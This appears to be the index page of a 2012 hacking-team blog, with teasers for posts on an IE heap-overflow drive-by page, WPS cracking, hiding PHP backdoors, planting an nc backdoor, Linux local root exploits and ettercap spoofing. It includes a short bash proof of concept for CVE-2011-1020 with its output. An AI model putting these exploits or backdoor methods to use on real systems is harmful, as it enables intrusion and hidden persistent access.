ms12-004: midiOutPlayNextPolyEvent Heap Overflow
The first web trojan (drive-by exploit page) of 2012. Target systems: IE6, IE7 and IE8 on WINDOWS XP3; CVE-2012-0003
Dis9 Team
The Underground Exploitation, Welcome Dis9Team
January 27, 2012
ms12-004: midiOutPlayNextPolyEvent Heap Overflow

Scan WPS AP With Reaver
Thanks to my apprentice Ps7isy for submitting this. The procedure for breaking the PIN authentication of WPS-enabled wireless routers is well documented, and we have covered it before. The harder part is identifying Wi-Fi networks that have WPS enabled: testing them one by one is inefficient and time-consuming, so this task calls for some automation. Below is a brief guide on how to make this painless.

January 25, 2012
Tool of the week: unix-privesc-check
Tool description as it appears on the author's website:
Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases). It is written as a single shell script so it can be easily uploaded and run (as opposed to un-tarred, compiled and installed). It can run either as a normal user or as root (obviously it does a better job when running as root because it can read more files).
Get it here: http://115.com/file/c2bhal4l

Hmm, I set up a DISCUZ forum
Update: because of pressure over the server renewal fee (the sponsor's disdain), it was forced to close.
OK, this is a forum focused on Linux security; the point of this post is simply to ask whether anyone is interested. This little site will rarely be updated from now on.
January 24, 2012
PHP Stealth Backdoors
How do you hide your PHP backdoor? Earlier, BRK introduced two ways of hiding a PHP backdoor, "With Htaccess" and "The HookWorm", and readers seemed to like them a lot, judging by the many comments. Today I introduce three more ways of hiding a PHP backdoor, though none of them works as well as the one the great hacker Brk炊少 introduced (The HookWorm). If you have a good method and want to share it, please leave a comment.

CVE-2012-0056 – Mempodipper, a Linux local root exploit.
code: http://www.dis9.com/code/mempodipper-CVE-2012-0056.c.html
// 2.6.32-27-generic UBUNTU: does anyone have test code?

CVE-2011-1020
#!/bin/bash
(sleep 3; echo 15) > /proc/$$/oom_adj &
exec /usr/bin/passwd
Output:
Read 69 bytes: 7 0xffffffff 0xbff646ac 0x0 0x0 0xf4d 0xbff646c8 0xbff64654 0x64b422
Changing password for test.
(current) UNIX password:
Read 69 bytes: 3 0x0 0xbffb4a84 0x1ff 0x0 0xbffb4a84 0xbffb4d18 0xbffb4814 0xf30422
Read 69 bytes: 3 0x0 0xbffb4a84 0x1ff 0x0 0xbffb4a84 0xbffb4d18 0xbffb4814 0xf30422

January 21, 2012
A Note on Updating Weaponized Nokia N900s
I wanted to make this post to save time and headaches for people who own ‘weaponized’ Nokia N900s. If you regularly update your Nokia N900 by doing (as root):
apt-get update && apt-get upgrade -y
I have run into some issues with some of the newer packages. Firstly, the newest beta version of nmap (5.59BETA1_armel) appears to be buggy enough to the point where it’s almost unusable.

January 20, 2012
Add a backdoor via nc use BT5
A little something from g0tmilk's video, shared with everyone. A newbie article; experts, please don't flame me! PS: posting articles on dis9.com feels more and more stressful; Amitabha, don't flame me~ This newbie has already gained system privileges on a machine through Zone 9's latest "ping overflow", so let's install NC to make the next "DIR overflow" convenient. Hmm!

January 19, 2012
Metasploit PSEXEC scanner (via Perl)
This module is about the same as the psexec_scanner.rb written by carlos_perez, which you can view here. The Perl script introduced now, written by spl0it, also scans a whole network range.

A tutorial on the powerful sniffing tool ettercap: my spoofing rules
ettercap is a powerful spoofing tool for Linux (of course it also runs on Windows). It lets you create and send forged packets at blazing speed, at every level from the network adapter up to the application software. It can bind sniffed data to a local port: connect from a client to that port and you can decode unknown protocols or inject data (only available in ARP-based mode).
brk@Dis9Team:/usr/share/ettercap$ ls
ettercap.png etterfilter.cnt etterfilter.tbl etter.mime
etter.dns etter.filter.examples etter.finger.mac etter.services
etter.fields etter.filter.kill etter.finger.os etter.ssl.crt
etter.filter etter.filter.ssh etterlog.dtd
brk@Dis9Team:/usr/share/ettercap$